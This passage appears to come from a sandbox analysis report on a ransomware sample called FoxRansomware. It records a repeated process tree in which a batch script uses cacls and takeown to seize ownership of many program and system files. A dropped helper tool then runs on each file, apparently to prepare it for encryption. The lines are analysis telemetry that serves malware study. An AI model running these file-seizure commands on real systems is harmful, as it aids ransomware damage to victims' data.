C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"3⤵PID:4360
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "server_lg.gif" -nobanner3⤵PID:4468
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "server_lg.gif" -nobanner4⤵PID:4464
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4500
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""2⤵PID:4352
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C3⤵PID:4532
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"3⤵
- Modifies file permissions
PID:4572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "turnOnNotificationInTray.gif" -nobanner3⤵PID:4488
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "turnOnNotificationInTray.gif" -nobanner4⤵PID:4496
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""2⤵PID:4612
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C3⤵PID:4552
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"3⤵PID:4652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MinionPro-Bold.otf" -nobanner3⤵PID:4684
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "MinionPro-Bold.otf" -nobanner4⤵PID:4604
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4692
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""2⤵PID:4608
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C3⤵PID:4720
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"3⤵PID:4752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "zy______.pfm" -nobanner3⤵PID:4776
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "zy______.pfm" -nobanner4⤵PID:4788
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4800
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""2⤵PID:4804
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C3⤵PID:4708
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"3⤵
- Modifies file permissions
PID:4724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "brt.fca" -nobanner3⤵PID:4868
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "brt.fca" -nobanner4⤵PID:3492
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp""2⤵PID:4728
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C3⤵PID:4924
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"3⤵PID:4928
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "eng.hyp" -nobanner3⤵PID:4856
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "eng.hyp" -nobanner4⤵PID:4936
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""2⤵PID:4900
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C3⤵PID:5024
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"3⤵PID:5040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "zdingbat.txt" -nobanner3⤵PID:5012
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "zdingbat.txt" -nobanner4⤵PID:5032
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5048
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""2⤵PID:4960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C3⤵PID:2220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"3⤵PID:3276
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "TURKISH.TXT" -nobanner3⤵PID:1904
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "TURKISH.TXT" -nobanner4⤵PID:5116
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5096
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png""2⤵PID:4976
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png" /E /G Admin:F /C3⤵PID:864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "PurblePlaceMCE.png" -nobanner3⤵PID:2480
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "PurblePlaceMCE.png" -nobanner4⤵PID:2032
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5076
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png""2⤵PID:3784
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png" /E /G Admin:F /C3⤵PID:2544
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2464
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "SolitaireMCE.png" -nobanner3⤵PID:3756
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "SolitaireMCE.png" -nobanner4⤵PID:3976
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png""2⤵PID:3092
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png" /E /G Admin:F /C3⤵PID:4068
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "SpiderSolitaireMCE.png" -nobanner3⤵PID:3368
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "SpiderSolitaireMCE.png" -nobanner4⤵PID:1976
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""2⤵PID:3788
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C3⤵PID:3992
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "FreeCellMCE.png" -nobanner3⤵PID:1884
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "FreeCellMCE.png" -nobanner4⤵PID:996
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3172
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""2⤵PID:2636
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C3⤵PID:1536
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "HeartsMCE.png" -nobanner3⤵PID:2836
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "HeartsMCE.png" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:1132
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:1420
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
PID:3580
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "watermark.png" -nobanner3⤵PID:1692
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "watermark.png" -nobanner4⤵PID:1772
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2496
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""2⤵PID:3892
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"3⤵PID:3672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵PID:2076
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵PID:3844
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2792
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""2⤵PID:2324
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C3⤵PID:3936
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"3⤵PID:3912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "license.html" -nobanner3⤵PID:1712
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "license.html" -nobanner4⤵PID:3920
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""2⤵PID:224
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:4080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"3⤵PID:2052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵PID:2632
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵PID:1588
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3592
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""2⤵PID:228
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:1308
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"3⤵PID:3472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵PID:3676
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵PID:3352
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""2⤵PID:2732
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C3⤵PID:3900
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"3⤵
- Modifies file permissions
PID:2176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "eula.ini" -nobanner3⤵PID:2356
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "eula.ini" -nobanner4⤵PID:2192
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3436
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""2⤵PID:3928
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C3⤵PID:324
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"3⤵PID:3888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "AcroSign.prc" -nobanner3⤵PID:4180
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "AcroSign.prc" -nobanner4⤵PID:2280
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3256
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""2⤵PID:2800
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C3⤵PID:2572
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"3⤵PID:1548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "forms_distributed.gif" -nobanner3⤵PID:1196
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "forms_distributed.gif" -nobanner4⤵PID:4072
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2448
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""2⤵PID:2348
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C3⤵PID:3212
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"3⤵PID:4156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "reviews_sent.gif" -nobanner3⤵PID:3104
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "reviews_sent.gif" -nobanner4⤵PID:3112
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""2⤵PID:1984
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C3⤵PID:3364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"3⤵
- Modifies file permissions
PID:4140
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "stop_collection_data.gif" -nobanner3⤵PID:4104
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "stop_collection_data.gif" -nobanner4⤵PID:4116
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4112
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""2⤵PID:1700
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C3⤵PID:2120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"3⤵PID:4136
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "ReadMe.htm" -nobanner3⤵PID:1584
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "ReadMe.htm" -nobanner4⤵PID:4144
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3644
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""2⤵PID:3864
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C3⤵PID:2972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"3⤵PID:1964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MinionPro-It.otf" -nobanner3⤵PID:2664
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "MinionPro-It.otf" -nobanner4⤵PID:2232
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""2⤵PID:4152
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C3⤵PID:3804
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"3⤵
- Modifies file permissions
PID:1664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "ZX______.PFB" -nobanner3⤵PID:3376
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "ZX______.PFB" -nobanner4⤵PID:3388
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1944
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""2⤵PID:2432
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C3⤵PID:2180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"3⤵
- Modifies file permissions
PID:2764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "brt04.hsp" -nobanner3⤵PID:3596
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "brt04.hsp" -nobanner4⤵PID:3264
-
-
-
